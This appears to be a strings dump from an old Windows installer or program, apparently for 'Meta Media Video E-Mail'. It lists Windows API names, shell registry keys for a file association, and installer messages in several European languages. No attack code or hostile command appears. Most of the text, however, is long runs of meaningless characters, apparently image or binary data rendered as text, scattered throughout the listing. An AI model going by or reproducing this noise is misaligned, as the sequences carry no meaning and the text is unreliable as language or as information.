klpnpqvxy
^`~^_k]_m_eg[ak_eveiq\ZrSPnIEmNKnQMlLGcF?\C?]EEcJH`KI_FDaIIbHHaGGdFEgCCqLNmNMj<;l=9lB=nA>n>=i;:tCEzTTsTSc:7c<4\:4Z?;VC<UB=YF?^KCdF;dA3i>-mA0gE5lD2d9*[8+W8/^<6aB9bA8cA;d?;`C<`?6j?6kE9kJ:iA.h?)c<-b?1[A5\:4V;1[C7cA4b:.j;-i?2iI<nK=lC4lG?hKGeLHaNI[JGYDBZD?^F@jHBi>5kA4kF8f?0h?0fE6aH>SF>YICXHBaNIbHAcE:d?1f9,gA5a@1g:-_9-]@1]F7\F;_FB`GKgFMeHQeHQdGPkHLmNQmKLk:8k:8k>:e;<d89e69d?ClMTjRZfHSeN\eTia[rb_ya`zgd}lcwm_jq\_z[^
^`~^_k]_m_eg[ak_eveiq\ZrSPnIEmNKnQMlLGcF?\C?]EEcJH`KI_FDaIIbHHaGGdFEgCCqLNmNMj<;l=9lB=nA>n>=i;:tCEzTTsTSc:7c<4\:4Z?;VC<UB=YF?^KCdF;dA3i>-mA0gE5lD2d9*[8+W8/^<6aB9bA8cA;d?;`C<`?6j>7kE9jI9iA.e>(
^`~^_k]_m_eg[ak_eveiq\ZrSPnIEmNKnQMlLGcF?\C?]EEcJH`KI_FDaIIbHHaGGdFEgCCqLNmNMj<;l=9lB=nA>n>=i;:tCEzTTsTSc:7c<4\:4Z?;VC<UB=YF?^KCdF;dA3i>-mA0gE5lD2d9*[8+W8/^<6aB9bA8cA;h86c=9^>8dH=adNL
KMu,3^,5a2;m1<n4>m2>h4>m4<q9Cs;Gw7Aq0:j1;k7@r9DvAJ|GM|GNyFNvJU{R[
_kmUacXdfammo|zx
:[k#@N)EPUt}
/*kNIPMIZSPZTObVPn]Zwhf
KNm-2Q
KNmILhRVo\^v//=
knsY_X?II2:>+.<-+<*)>,+G41I85G54;+,3"%3"%2"#4$%2$%1!"0"#3%&1" 2!
KNVimrHOR "*%$-0-6,(..*/635A??D?@
{{k[nwcW
k}~_nz`m|dp
:[k#@O(DOUt}
KOk@Jh8EeALlGOmMToY`yLYsCNl@Ij@JhLUvGPrENpAJl6Aa9DdALl<Ii@Ln=Ik>GlHPuIRwS\
K\oKYoM_vM\vR`|Uc
k]om\q
 kopiowa
Kopiowanie tego oprogramowania i jego dokumentacji jest zabronione.
Kopiuj
Kopiuj pliki do : 
Kopiuj podr
`koR]a\dk_hqkt}hox^dkrv{
^K{PAoH:fC5dB5oRD
k_[pd^
kpjLQhMPiNQeJMfLLgNLgNLiMMeLPwY^
}kpnknlnqoorppsqnqomoopppqqqoooqonpnmpnmomlmkjlllhlmejmX^c^ho
}kpnlomorporppsqnqomoonppqrpopnqonqoopnnomlmkjlllgklejmX^c_ip
kpoqprtw{py}mv
kporqstw{py}mv
kpqpuxuz}
kpspuxvy}
kpsTY\`ehZ^_`eduzy
KPw@GnQX
+k -q$3x+:
K\qIZoO_vM\vRa{Vd
K:\Q.pdb`q
kqpkojlpkjomlqpejkdij
kqpkojlpkkpnlqpekjejk
kqvotwpzzp{yt
K;R8(T5&W8)Z9*aF8nYJ|_Q
K\$Rc+^n+_o(_n,an2ir9pw6mt*aj(_h3jsIz
(-$KRK
kroLZY
kroM[Z
kroQ\Z
kr{QXaLOWQUZSU]QT\DLS@JQgluy~
kr{QXaLOWQUZTV^RU]DLSAKRgmty~
kruZa^]a[b^SgZJn[F
kr|XdoO`mL[fDOvOW
kr|XdqO`nM\eCNvOW
KRyLSzNW|NXzLW
K_~*<S
K^sObwO`zN_yRc~Qb}Uf
K>_<.S<,T>,XB0WG6hUH\SFWQFkbY|j_
^KsWL}YS
KTvBLnHQv]e
KTvBMmJSxhn
KtvL:3`D={aU
KTWV[^cfkouz{
KTXV[^cfkou||
KTy<Io5CgBLnJStKTuWb~KUsFOpIRtENpENpAJl>GiDMnFPrKUwKUwEQuPY~U^
KTyISqQ]uMZpWb}NYuXi~PdvSdwi~
++	KU1t
k' u70
K($U76Z@@U;;J.-J-(?
K:}UIy\Xmaajbc\XWd\]wln
K:}UIz]Ymaahbc\XWd\]wln
KU}KU}HSyIUyMV{NY
KU}KU}ITzIUyMV{NY
KU}PWxMUrMXsR]xS\wYc{\j
KUwAKmJSx_h
KUwHQrITtK\vFZsPcx[n
KUwHQrJUuK\vFZsPcxZm
K($V78Z?BU:=J.-K-(?
K>vD>m<:i:6h95kB?uPLvXSpHCmHDlJJpOSlRRlSQkRPjRRnSOkRPjNMjHBmGBsNJtULtKHjEAhF@hF@lJDlJDeE?hD<gD:d>2b?2m@5pD7qL>xUGpG8mB1mH:kG=oM@rPCoRDnTDtVCuWFvTDzO>zG7|M?~TH
K>vE=m<:i:6h95kB?uPLxXSrHCnHDlJJpOSkQQlSQjQOjRRnSOkQQjNMjHBmGBsNJsTKtKHkFBhEAhF@kICkICeE?iE=gC;c=1b?2j@4pD7qL>xUGpG8mB1mH:kG=oLBrPCoRCnTDtVCvXGvTDzO>{G:}N@~TG
K=vG9S@3XF;XF;cIBfPEoODwVF
kVGoUErXH}cS
KV|HT~EP|ALxBL{CL~GO
KV|HT~FQ}ALxCM|CL~GO
k`viaY
kVi]W]WR]UN\SOYPMRJJXNNg[Wo\UmF=mF=jC4dC/g>(gB,cTA^aRS^VQXQQZM^iYdk\kcVkSGpI:nN;dF5e<3[93bD?
KV|NWxLWsO[sIWnL[uN^uL^uZp
KV|NWxLWsO[sIWnM\vN^uM_vZq
KV|PWxMUrLYsQ^xS]uYc{\j
_Kv=(r8"s;"xB)
kVrVOi]W]WR]UN\SOYPMRJJXNNg[Wo\UmF=jC4dC/g>(gB,cTA^aRS^VQXQQZM^iYdk\kcVkSGpI:nN;dF5e<3[93bD?
kVtWPi]W]WR]UN\SOYPMRJJVNNg[Wn\UmF=jC4dC0g>(gB,cTA^aRT_WQWRQZM\iYdk\kdUkTEpI:mM:fE5e<3[93cE@
kVtWPi]W]WR]UN\SOYPMRJJXNNg[Wo\UmF=jC4dC/g>(gB,cTA^aRS^VQXQQZM^iYdk\kcVkSGpI:nN;dF5e<3[93bD?
kv~UagXdjWdlW`ieluow~v~
KVvJWwETt>PoH[vRc~Qb}P^tALZ*/8 ","$.%+0,.8)+5+-801?..>+,@
k]wcXsaVo_SiYMl[N~l[
\k{Wgxhu
Kw`Hv_Jv_Jo[HlVJkVGhSIgTFfUFgXFgXAcX@cY?cW@dXBdY<bP;aO6[K.RD"=43;;
KW[hwy
KW[ixz
Kw~Jr~Lt
kw~jv}jsvfmr`gr]er]er[cnZ_l[_kW\nS\tU^mR[hVc
kw|`moT^eMW`FX[FU[GT\HUcKWgLVhFPnISrOSvWZqIK}UV
K\w<Qm=Rm=Tn>UoAWpFXoet
KWWNY]ajmltsjuspyv{
KWWPY\`jjlttjusnyw{
KWY=JLCOSAMQ@LP@LRBNTBKT<FM7AH3<F7>G56@;:<TXY
\k{Xfxhu
K_xHWgFScBKX9BL5;Hnpz
K_xHWgFSc?MY7@M6<Inqy
K_`X;,jI9
K.x@#l6
K,x@#n7
k[x_OnSIioLU
kxp^kt]k
kxr]lt]k
K)x>!yK@
[K}YI|XH
ky~]kcAK\:@W56O/0cDCgEEQ32J+*J*+S43U50K&
|ky|_n|[juXgvXkp_zmczrm|yv
|ky|_n{ZiuXgvXkp_zmczrm|yv
kYq]Kg^CchHUK:WF9OD6QE9UG;aODmPGuZL
KZc$19(4>)5A&1?
]KzO@oH:hD4dC4oRD
~k\Zp_\wdar_\mZWjWRfSNiWPn^Xqa[n]T`QH
~k\Zq`]udar_\mZWjWRfSNiWPn^Xqa[n^R`RF
k]zSEoOBuZPv
kZv_PnXMkeNX
kZv_PoWKbaEG
kzw#@x
l03HEIa]_wxx
L$0PSh<
`:{L1G,"[KLu`h
=*(L1-P,+M&%L##K"'N#*Q$+R'/T+2]+-U!
,L!1V"1X"1X#1[
%L 1X$8[%9\':[&8W);Z+;X5C`4B^.<Y1?\7EbAOk?MiFSmKXrIVpTa{\i
,L"2W"2W"1X#1[
L3{I3_(
L3#L;(UH8VH6TE2WQ>TZIR]MPZIRUERQ=WG;V<6V60xRN
L3zJ.sH'
/l#4l#(G
L4"L;&UI7VH6TE2XQ>VYIS]MQ[JRUETP=UG;V<6V60ySO
L$4QSR
/l!5l#(G
L5PFHP7b
L5_u\WqYXx_Qx_Ls^Ip[KnZMkXLdRH^LCZKE`PA^N>]NA]PF`RH[JK_LF\I?RA2C5(-$HA>
l" 634IGJ_]_wwx
l6/xD=
L7xF4s>1
^;.l8'
L8}@,|@*~@(
L8K}eIzdFwaDuaAq_=m[:k[:h[:dY;cX;cX:dY;f[;i\;i\5cV'VF!RD
l8,|PC
"L8-YA5mPA
;L8-ZB6kQA
L92S=7hQI
L94R:4cI=
L94R:4dJ<
L94zha~ngsnmostnx
;!,L9HhMY{R[}Yd
L9wB.r@.xF4r?/q?+t>3w=1w@1p<+z?,
L9wB.r@.xF4r?/r>.p=3t=0uA0t<+y>.}E4
>L9,XA2kN?
 L9,XA2kN?
La destination du registre pour installation
La instalaci
@l}Am~d
language_file_count
language_file_dest%d
language_file_src%d_%d
LA~PEzSD
La riproduzione di questo software parte di esso e proibita.
l`\aROiXUkZWkXSp]XkXSeRMjXQo_Xqd\h]Uyri
La seleci
Laufwerk
law`QoXIhTCiVGxh[
laz`RoXIhTChUFwgZ
?LbANtENyAJoFRtYg
>Lb>NsEOwBJoHRtXf
lbogXf`GUX?ML8DP8BPAOQIZDCSADRKKWODTN=JM8AO;GO7AM2;I/5K/5R3:L06M6:O8@H9AA=C;;AFGQTT`IJTFFLQJOQBFOACK=?O>GMGRKHWCCSBBRJKYLERTCNT@LRDOYHSPGQRHUTO^\Udl_o`WdOBPcVdp^oZM[aHRuamiWd;08, 
lbohYg`FVX?ML8DP8BQBPOIZCCSBESJJVODTN=JM8AO;GP7AM2;J06M.5T3:L06N7;P8@H9AA=C;;AGHRTT`HISFFLPJOQBFOACK=?O@HNHSKHWBBRBCQJKYLERTCNTAJSEPYHSPGQTGUTO^\Udl_o_VcOBPaWdp^oYLZ`FSt`liWd;08+
lbt_PjfIR
lc~b[x`Z|fZ
lcfVQRQNJKIABA7EF<>C:CJEZbagswiw}l{
Lc}H_oCWb@OX>HRciv
Lc}H_oCWb@OX>HRclu
LCMapStringA
LCMapStringW
`:LC/NA1I@2D?0D>1A=+EF2IG5SH4TG1RQ<TR@WQDNWJIVHNXKKYNOXNNYOT^QWXHWUCSK:I6'D&
`:LC/NA1I@2D?0D>1B>,DE1GG5QH4TG1RQ<TR@WQDOXKIVHNXKKYNOXNNYOT^QXYIWUCRJ9I6'E'
_;LC/NA1I@2D?0D>1B>,DE1GG5QH4TG1RQ<TR@WQDOXKIVHNXKKYNOXNNYOT^QXYIWUCRJ9I6'E'
l+|c r
LCU@8WB:ZD8_H8`B)lI/yS5
lcuZPeMG_HF`GEgMGy\U
lcv[QdLF_HF`GEhNHy\U
lcv[Qv[QdLF_HF`GEhNHy\U
ld|mj}nlzkivge
L/|D'o7
ldr`Ywd_ub]jWR
l\~dVr\PeUEXr</
ldwbZeZRfj^UiVE[H<jS;~c3
ldy^ZsYYy^Z
L$(E@;
LEBIIC
lection d'environnement op
Legen Sie bitte Diskette# ein.
Leggimi
lE}h?t`=nZAm\CgY3QF
Leiame
LEs*!m!
Letzter Schritt
lEvb?l[=jZ9hX9gZ6aV5_T5_T9cX>h]Am`?ma6fZ)UH"PD
lEvb?l[=jZ9hX9gZ6aV5_T9cX>h]Am`?ma6fZ)UH"PD
l\}eYt|uJ
lez\Wl\Wlii{QQc<=Q\]rV\s=D]RWpjk
lez_Xm\Wljh|QQc=>RZ]rV\s=D]RWpjk
"l~#_f
&L<>f@Er
%L<>f@Er
LFK,+-$Y-_
\LFS>6Q=8F3.G/#N.(O4&X8+Z@2`E7nM>qN@|UF
|lfzlm|om{omznlymkxmixmiwlhwnkummsnmxvv
lgbOJYDBXB=X>8aD?aGA_E?VBAWBA]A@_B;fG>
lgcOJYDBXB=X>8aE>aGA^D>WCBWBA]A@_B;fG>
_>.lH6
lh{daqvp
lhPV}9
LI}FC|EB|EB{DAzC@zC@zC@yDA{D?{D?}F?
li~igxf_zhaq_X~lezha
LI~KH~KH|IF}JG~KI}LJ|JJ|JJ}KK
Link to web site
li po*
LIPrpu
{li}qq}qq|pnxljwlhxmiynjymizokwlhpgcyro
Lis-moi
lj{b^bGC^D>dFAmOJjLGdGBX@:]E?dGBkMHfD>oA9
lj{b^bGC^D>dFAmOJjLGdHAW?9]E?dGBkMHeB>pB;
`l`]jb`oki|ym
lj^IG`KIcNLaLJXEBUB?aIIePNaMH`MF\IA]IHWHL]QW
lj^IG`KIcNLaLJXEBUB?aIIePNbNI`MF\IA]IHWHL]QW
LJ~KH~KH
LJP,%,3(07-3:06;08-H\0K_5O_;WbB_cDcbDbc<Wa6Sa-MZ,LY.KZ/Tb:^n?^m?Ve8GW1?K+=D)<C'<D$=G&?I&?I(@L&@N&=L&9A$36$13&43(44)57*3605847;68@69>7:>8;?9AA8EC0C@+@=(=?)=B(:A+;B*:@%47%24(46)57,58-69,58*68)57+47*36(14%.1%13*68*68+47,58-77'35/777=<7??8=><ABDIJEMMGSUK\_Zikamm^caab`ea`aUS
LJP-%,3(07-3:06;08-H\0K_5O_;WbB_cEdcEcd=Xb7Tb-MZ,LY/L[/Tb:^n?^m?Ve8GW1?K+=D)<C'<D$=G&?I&?I(@L'AO&=L&9A$36%24&43(44*68*3605847;68@69>7:>8;?9AA8EC0C@,B=(=?)=B);B+;B,:@'37&35(46)57,58,58,58*68)57+47*36&24#/1%13*68,58,58,58-69)25/767=<7??8=><ABDIJEMMGSUK\_[jlamm^caab`ea`aUS
{lj}pr}qq|pnxljwlhxmiynjymi{plwlhpgcyro
ljshjoghqfhqiinji
L&!k?2
LK~23{
L<k3"p8'g;*c8'd7,qD6
[/(lKBoQF
LK}EDvDCu<;m66f11a/,^11_52c52c52d-*\*'Y,)Z41b00`/,]/+\0,]2/`11a11a22b22b46f45g68n>@vEI|HL
LK}EDvDCu==m66f11a/,^22`41b52c32d,+])&X,)Z42`00^/-[/,Z0-[20^22`11_22`22b45g56i69l=?uEI~HL
LKeHGaTPiRM\0). 
LknEejo
l/%l1'n1's6,r5+j/%j.(s86|@A
L]-^l:ky8mz0er$Ze!Xa%\c)`g-dk0eo-bl2cm6biY
}}}lllRRR888UUU
>l}@l}Lw
L$lPhL
llt]asahrdjugmtfjtcfubep_cn]`l[^iX[eWYo_`qabl\]i[\iYZiYZmXW{VR
llt]au`hsekugmseirdfubep_bn]`l[^hWZhWZo_`p`am^\hZ[jZ[iYZoWW{VR
|l`^l_]tebxif~mjyjhreck_]j^\neboggmfc
|l`^l_]tebyjg~mjyjhreck_]j^\mdaphhngd
|l}m\jcP_\KY\I\_NccVli_vjbypi~wk
L<{M<|QB
L/}?'n2
L/}@&n3
@LnFTp@UpK_xYq
lnu^bgRTeVSl[Xx_[
`lnVbdYegammp}{x
L]._o8ly9n{0er$Ze!Xa%\c)`g-dk0fm-cj2ck7cjZ
LoadBitmapA
LoadCursorA
LoadIconA
LoadLibraryA
]loiuy
]lojvz
:L%OK(
LOn/2Q
,L /O /O$4Q 0M#4O*9S>KeS_wZf~^k
,L /O /O$4Q 0M$5P*9S>KeS_wZf~_l
L[|OZxMZtVf}ap
L/(P;3w]V
lp6a J
LPl@Jh9DdALlGOmMSpY`{MZtBMk?Jj?JhJUuFPrDNpBKl6Aa9DdALl=JjAMo=Ik?HmIQvJSxT]
lpqYaX?II38E34G54G63B0/B/,C2/F3.E2/;)(5#$:()<('<(':&%1 
lprZbX@HI38E34G54H65B0/@/,C3-F30E2/;)(6$%:()<('<(':&%0
LPsU[~in
LQ~HN{EM|CM}EP
lQ~kDua;kY@l[BjXAkZ8`T2]P9eXBnaDpcCn_<hW.]M*WG#RB
lqoP[Y
,LQ+OU
l~q[wm[
l~q[xm[
l\{RCoRCuYNf
lRfVFdNC`LAfL@
L[RH]PH[RI\SIaXKne\ymc
LRi<H`5D^*:Q,:Q1AR*<M(9L3BU4BU-;NDPbGTd0@PX]rxw
\L}`RiLC_H@gKDybZ
L>R>-SB5SG;TKBXOKb\Wlia
Lrv^1#n4!
lryECI405/.23.02-/724516[Y_
lryECI406/.24-02-/724405ZX^
^lrZilgsw\fmX`gX^cY_fhpwclpz
lsfB|cB|d?wb:n\5iX1dV(]O%ZL(YK)VF)VF#UC
@ls;foAjsDktDjv@cpAcp8Zj*O] PT,`f4kr5pz6p|=t
@ls;foBktDktDjv@cpAbq8Zj*O] PT,`f4kr5pz6p|=t
LSN@0)C0)Q7)a@1uL=
LS~OX~NW|MV|PY
LS~OX~NW|NW}OX~KW
lstrcatA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
lsvHNS
LSzLSzNW|NXzLW
L;t6&l8,sE>zTO
L(tD i9
L[TKn]T
ltwfotcnvdqxjvwiuvgovenugmwgnugsxv
ltwfqsbmvdqxjvwiuvgowfoufnwgnugsxv
ltzbls[eeNVJ5=5%,4&27->0%9/
ltzcks\deNVJ5=5%,4&26,=0%9-
%	l(	u,
Lu~;bkAmtIt}Fmv>dhLlw;am8fnX{
l]um\l
luvjv~w
Luw_>*qB-
luxluyny}
LUzISqQ]uMZpWb}NYuXi~QewSdwi~
L'vD i9
LVn6AW.;Q9C[5@VBMcdk
Lv{T=5RB2jF>vXG}bT
LVxAKmJSx_h
LWC8fL@
LW_JQZELUGS_KU_MWaTYbSV^JMUEKPDKNFORMlun
{LW_JW_RYbRU]GMRHMPFMPEU[Tv|q
l}wM}O
LWr;Hb>Jf`m
LWr;Hb?Kg`m
LWsU_w\h
LWsU^y\h
lx|?FI;@A6=@BGH>DC<Sb1IU6OY7MY>O\<R^<Q`@Ud<R]:MU6GP7LT>^dMrz`
L<xG7tF5wL=sL>oI=sL>|OA~J:
L<xG7tF5wL=sL>oI=uK>|OA~J:
l{~Xgjamqmy{p||t||
LXt6He3Eb6Da>Ig?JjCNnITtKVvDOo:Ee:Ee?Jj5Bb>JlFPrCLq=Fk7@e:BgNU|hm
LXtFTpEVqTe
lXWh\XvdelV[UJMRILTMP\SV^TZ_W^
L*x>!yK@
L`yCYr;Um>Wq@Wq.D]"7M\m
L`yCYr;Um>Xp>Wq.D]"7M\m
l{~Yhkamqmy{r||t||
\L}YI|XH
lYjaL[kWdt^jaISYBJN7<aJO
lYjaL[kWdt^jaISYBJN7<`IN
ly|^kaBK\:@U48N./cCDgEER43J+*J+*S43W40K&
L`yK`{Tj
L:Y<.Q8.R;,R6+V:/aA4mH:wPA
LYsR`w]k
}|lYVbOL^KH^KF^KFaNIaNGYF?ZHA`MHbOJ`TP`WTPDDummiab:23D=@xtyYU[!
lYvG9Q*!P.(M.+G.,B.-E2/D1.A.+>+(>+(>)'>)'@+)>)';&$<'&:#!:!
lYvG9R+"P.(M.+G.,@.-E2/D1.A.+>+(>+(>)'?*(?*(?(&;&$;&%:#!< 
LY!Xg)`o;r
l,!z;3
LZ32.dll
LZClose
lZdC4F,%A.+=-.6**1%%:+(<-+9,*4(&6)'5(&1%!4($1($2&"5%
lZdC4G-&B-+=-.7++1%%:+(<-+9,*6)'6)'5(&2&"4($3($2&"5%
LZDone
LZ~DStAMo7Dd6D`LZqLZm?I[+2A#(1"%*%%+&)-#++,.8,.8,.8-/:12@(+:
^L{ZF}YG
LZ}HU|JV
LZ}HV|JV
L;(zM2
LZOpenFileA
lZqxex
LZStart
LZvEUr=Tn@Wq@WqCWpHXocq
LZvEUr=Um@WqAVqCWpHXocq
LZv=Ol:Qk<Sm?VpAUnHZqgv
LZv>Pm:Rj<Sm?Vp?UnGYpgv
~lzylx~fv}ls|lik
M-"?,$*"
M0~H*wA(k6!]-
M*0SNRoNVm
M0'W5(jA2
=+)M1-P,+M%$K!#K!&M#*Q#+S%.S+2]+.T!
m1\U\Kcn
M>{=2r7.x<6zA8n8-m6-t>7q:3n7.n4.s86t<;
,M$3S&8W&7X&9ZAUxYn
M42Q:8`KCzbV
,M%4T'9X&7X%8YAUx[n
M>5M;0YC7hM?uWF
M6_u\WrXXx_Qx_Ls^Ip[KnZMkXLdRH^LCZKE`PA^N>]NA]PF`RH[JK_LF\I?RA2C5(-$HA>
M6_u\WrXYy`Qx_Ls^Jo[Mm\LiYMeSF^LBYJF`PA^N>]NA]PF`RH[JJ^KF\I=SA2C5'/%HA>
M6WrXXx_Qx_Ls^Ip[KnZMkXLdRH^LCZKCZKE`PA^N>]NA]PF`RH[JK_LF\I?RA2C5(-$HA>
M7,YC8kQC
M8~G2~G2
<M9.\D8nTD
M9qF5tI:
M9wB-v=(
Ma{5SK
ma]aROiXUn[XkXSq^YkXSeRMiWPo_Xqd\j]Uyri
]MAcO>oWE
ma~h]{eZxbWs]Rp\QjXMhUMfTIdQDbOBaODbRFiXOj^Tl_WjZSfZPg]SkaWi\ThYPaRI^MD\L@\J?[I>]J=[H;[G<[G<\H=[G<\I<`J>bK<bK<eMAkQEkPBkN?qRCuTD|ZJ
ma~h]{eZxbWs]Rp\QjXMhUMfTIdQDbOBaODbRFiXOj^Tl_WjZSfZPg]SkaWi\ThYPaRI^MD\L@\J?[I>]J=[H;ZF;ZF;]I>\H=]I>aK?cK?fO@lUFrXJv\Nx]O
MailServer
ma{k^{n`
ma|l_}m`
manufacturer
*<M/AR6FVTkz
mas^WfVO^QJYPO_FIXJJZDGV;DQ?FU2=K1>L3@N4>O1;L'1B-8F)9J%9J%7H$3C*5C+3D*.A85Kdj
MAvH=qG;oI=
MAvH=rH<qI=
mb{eYoZKmXIoZKr[LlUFp[LlUElWH~la
mb{i^zi\
mb|j_{i^~j_yfY{eYxeXwdWu`Qp[LjSDkTEpYJr\PwaUxbV}dZu_Tt`U
mb~la}k`|h]|h]
mb~la~la|j_xf[zi\yfY{g\zi\~la
MbwK_q
MB>ZIFr_Z
M@c/#['
^Mc3!b.
mccj^\k_[o`]tf`rf`qeargcpgdkb_lfake`
mccj^\k_[o`]tf`sgaqeargcpgdkb_lfake`
MCp84i&;w)`
mcsa[lWVfNO]FHSHDPJGVBESFM`>HZ;EV>HY=FT<CR6;J8;I;@O9=O9=P48J3;L3?Q3=O26ICAUQSeNUhITjEQi5CY:EY>I]?IZ<FX;DXCL`@Ka@KaAI`<CWCH]GMdCMeDMh?FaHMfKPiLRiNSlKRmNSrZ]|ln
McuJ^pJ^pN_tG_qJ`rObwQbwMYkMV`FNUIOVEPTLW[EKRBKT@KS:CL;GM4;D9AH3?E0>D3?E6@G3=D5AG1?E2>B2>B0<@0<@4@D0<@.:<0<>/;=09<2;>1:=09<09<1:=0<>'33,44-771:=09<4<<7@D9RVLu~
mcx`Ty_S|_V
mczf[zf[y`V
^Md4"a-
^MDaK?rXJ
<?MDHZU[nV]q^i
^MD^K>kSG}]P
M:d:m:
MEFm\e~kt
Men* starten (auf das Men* Start eine Kontroltafel hinzuf
Menu de Iniciar (Adicionar panel de controle para o Menu de Iniciar)
Menu Start (dodaj panel kontrolny do menu Start)
mero de s
mero do arquivo 
mer_Wxd_
@\m+ES'AHo
mese_qe_td^lbXnb\bSWgUVlYT
MesQUGATNC[QJ^PJ]QGnbX
MessageBoxA
 Meta Media, Inc. 
Meta Media Video E-Mail
mf{f^|b\|f`{c]
mf{f^|b\|f`|d^
MF}G@xD=rA9l=5k:2i71e62a54V/-Z.-X01[6>jEUrMaoI_iBXb>Ob=Mc<Kg?KnDOoFN
m%	f#	`#	^:#j
mf|jcyg`vf_~of
_MF_LEqXN
mf|mj|mkyjhwhf~lk~omymixlhscdeU\OAG<28b\W
mfo]V|jc
MFqB>oA?m8:j6:k38i16c/5d15e37h37h.2c,0`/1a05b24d13c/1a/1a14a14a03`25b-/_./a./b.1d48m>BwDI
MFqB>oB?p79i59j39h06c06e15e37g28g.2b,0`.0`24d55e44d22b/1a24d02b03`14a-/_-/_./a.1d48m>BwDJ
mfr`Yyg`p]V}jclZSxf_gUNvd]aOH
mfs`Yxe^q^W
mfs`Yxe^r_X
@\m,FT(AKo
mfuc\zhafTM
mfxf_|jctb[
mfyf_|jctb[
[<mG!\:
MG~C=|A:~C=
MG~HAxD=q@8n=5k:2i71e62a54W0.Z.-[12^7?lEUsLaoI_iBXb=Qb=Md:Ki>KoEPoFM
mg~kcsZPfOGmSLt[Qx[Rw\N
MGyA<l74f30e3-f4.e3-f4.k93k93h60f5-n=5vB;n:3f3)g2(r>2{E:~I<
MGyA<n74e2/e2/f30f4.g5/k93k93h60g6.n=5vB;n:3f3)f1'r>2{E:~H=
_M|[G}ZF
mh}ga}e_
mh}ga~f`
mh}jh|pm
mh}jh|pn
Microsoft Visual C++ Runtime Library
Microsoft Windows 3.1 (16 bit)
Microsoft Windows 3.1 (16 Bit)
Microsoft Windows 95 oder NT (32 Bit)
Microsoft Windows 95 o NT (32 bit)
Microsoft Windows 95 or NT (32 bit)
Microsoft Windows 95 ou NT (32 bit)
midMKzca
mimTRxca
MINHBG8353,1605827938IGMQS[MOY^`kv
MINHBG8353,1605827938LHNQS[MOY^`jv
Mirar CD...
|{m[iZJbOB_MBaNGqXT
|{m[iZJbOB_MBdNHrYU
?Mj9Gd9DbDOmkt
mj|adzdivdkscjybgxbgxcftbcwedsa`sa`vdcrbcrbcsber_bs^au_a
MJL?:9d`[
MJL@;:ea\
mjlprz27@
~mj~pq
|mjsa`zcg
\mjU83S2)W2*[4+_9-i</nA4
|mjua`zcg
_mk:HD@KCDLB?F?GKE]a[ilcglc`h]dpdcqffvkozpx
mkr\WeMGjPJgJEeGB^B;`F?aIC^F@_D@gJEiIDkHD}YS
mkr\WfNHjPJgJEfHC_B=aGA_IC^F@^C?gJFiIDkHD}YS
m]}kZyhU{pZrsYjyYb
M-'L'#J-$I1+L61I50E5/D1.E2+I3'
MlK+u)e
]M~\L}\Ly[J|[K}_N|^M
?m~<m}3fv1as5hx>o}6cq
?m~<m}3fv/as5hx>o}6cq
@Mm9Gd9DbEPnkt
MMeHGaTPiRM\1*/!
|m{m\jcP_[JX\I\_NceUlk^vlbyqh}wk
mM~jDr_6[K%>0
mM}kDq`6[K&=/
mmmC_wd
mmmLOSfiq{|
mmmLOSfiqz{
mmmZZZFFF222
MM Video E-Mail
MM Video E-Mail\DefaultIcon
MM Video E-Mail\shell
MM Video E-Mail\shell\open
MM Video E-Mail\shell\open\command
MMYHDOADIADHCFJ<BA;IEAOMETVGW]Sci]msYhkDQS4BA6DC9IH9IHJ[^YhqWfvRdoEVc@PV8DJ03;#&.%'1,/747<kop
m_ne[C
[M~N<}F1
M]nRatVcyM[rMZtS`zVc}T`|Ua}NZvR`|Xe
MO{33g
Mo|AanGmyGmy?iuBn{@mzDq
Mo|AanGmyGnwAiuBn{@m{Bq
M\oHVlMZpR_yR_yQ^xXe
M\oHVlMZpR_yS`zQ^xWd~Xd
[M~\OnRGcMA\G?`J?iSGoTF
M\oSbuVcyM[rMZtS`zVb~S_{T`|O[wRa{Xe
mov_chSUeVTm\Yy`\
&]+<mp}
mp{hkxfgzgjwijregtclwgr|il
MplB0)<'
MPT[^b|
mPw^Dv^Bx]Cw]EvaFt]Ct]Ct]Ct]Ct]Ct]Ct]Ct]Cv]Cv]Cv]Cv]Cw^Dw_Cx_Et]CzcIy^I9
mpyijyghzgjwijregtclugrzil
^mpZilgsw\fmX`gX^cY_fgovbkoz
+m -q#2w*9~3C
&M!*Q/6t[_
MQt8>k3:k6@p<@s>?w<@z?D{?D{?Fx@GxCIv9@k6<e=Bcjo
MQtU[~jp
-_(Mr=`
M/.R88G//G+*> 
M/.R88G//H,+> 
M+	R)	M 
'*.MRQGNKoxu
(+/MRQGNKpyv
mrs7:>DFG
mrsoqqooovqrxrsxtsupqrpptrrsqq
mru7:>DFG
MRyINuNRuNStMRs\a
MRyINuNRuPRtOQs]b
!MsE?:
M@sH9nRG\
ms|MOo<9_1*e;<|W_
MSN Gam
!MsNKG
]msPndBu[=sT;mK3mD+xG-~E0
msroqqopnvqrwqrxstupqtoptrrtrr
msrO\Z
MSv=Ba
MSv=C`
MSVCRT.dll
msxfimWZ^OIJMEFF@AE;;;65<78<67;340966972@:0H@'RE$cO#z^&
m^tgYwj\hcTheVafW^eXYcWU\WOSTPUVSXWRYT[]]a_^_`^fc^_b`khcbcZne[th\znbri\
m^tgYwj\hcTheVafW^eXYcWU\WOSTPUVSXWRYTZ\\`^]_`^fc^_b`khcbcZne[th\ymari\
m[tjY{o]xq^kk_vqbji_jg_ie`oldsmfvpiwlnmjf
m[tjY{p\xq^kk_vqbji_lf_ie`qkdsmfuohwmmmjf
MTMC9/A4,G;1YI<bO@oN>zN=
MT{NU|TZ
mtqO\Z
%M$,T"+W *Y"*Y!'T
MU1[h?cs<ao>hu9cp9er>jwHr~f
m^U]I>[E9^G8`F8nTFqWIsYKsXJtZJoRCpRAvUE{ZG
Mu~Ito3pY
MultiByteToWideChar
MU}LTyNXvNVsO\vIToR]xSaxXh
MU}LUwNXvNWrP\tIToQ]uR`wWg~[k
 must at least 32k colors to run this program
MV{BKv9Dp9Ft9Ft;Iz@L
MV{BKv9Dp9Ft;Iz@L
:M<Vge
\mvIZ];OP8MNDVUTbacidliatdW
\mvIZ];OP8MNDVUTbacidliaueX
mvj`m[YlYZn[Yl[Xhk`h
mvjOYgOWdMUcKS`IMcNMcNMgOQdMRpTZ
mvlR_9 .0
mvmSa9 .1
MV|OW|OW
MVqT[vvz
MVwITpJVrLYsFTpGYpVl
MVY`imry|~
m[\wbd
m[\wbd}giT>9_E>qUJ
M[wDOmEOm_b
_M{WGzYItXGuTEzYI
MWoSZsvz
M[w>Pm<Tl>Uo>UoAWpEWnet
?mx0mr'pl
